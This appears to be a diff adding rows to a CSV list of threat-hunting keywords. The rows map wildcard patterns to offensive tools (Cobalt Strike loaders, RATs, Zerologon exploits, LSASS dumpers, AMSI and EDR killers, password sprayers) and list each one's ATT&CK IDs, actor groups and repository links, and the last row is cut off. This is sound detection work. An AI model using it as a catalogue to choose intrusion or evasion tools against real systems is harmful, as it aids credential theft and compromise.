+"*YDHCUI/csload.net*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" +"*YDHCUI/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*yeelight_discover.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*ylAo2kAlUS2kYkala!*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Yml0c3kubWl0LmVkdQ==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*YmxvY2s9MTAw*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*yogeshojha/rengine*","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","5913","923","2023-10-02T14:05:29Z","2020-05-03T12:13:12Z" +"*YOLOP0wn/POSTDump*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*You are trying to target a User Group Policy Object while running the embedded SMB server*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*You_spin_me__round.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*youcantpatchthis*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*youhacker55/PayGen*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A",,"N/A",,, +"*Your Moms Smart Vibrator*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*ysoserial -*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial-*.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.exe *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*ysoserial.net*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.sln*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*yunuscadirci/CallStranger*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" +"*Yuuup!! Pass Cracked*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*YwBhAGwAYwA=*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Z4nzu/hackingtool*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*zabbix_session_exp.py -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" +"*zabbix_session_exp.py https*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","1","0","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z" +"*zabbix_session_exp.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" +"*zarp.py*","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","10","1376","340","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z" +"*zblurx/certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*zblurx/dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*zcgonvh/DCOMPotato*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*zed2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*zenmap.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*zenoss_3x_command_execution*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*zer0condition/mhydeath*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*zeroday-powershell*","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","4","323","96","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z" +"*zerologon clone *https*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*zerologon.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" +"*zerologon.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*zerologon.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*zerologon_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ZeroLogon-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*zerologon-restore * -target-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ZeroLogonScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*ZeroMemoryEx/Amsi-Killer*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*ZeroMemoryEx/Blackout*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*zerosum0x0*","offensive_tool_keyword","zerosum0x0","github repo username hosting backdoors pocs and exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/zerosum0x0","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*zerosum0x0*koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*ZGF0YS5mZGEuZ292*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*ZGIuc3NhLmdvdg==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*zha0gongz1*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 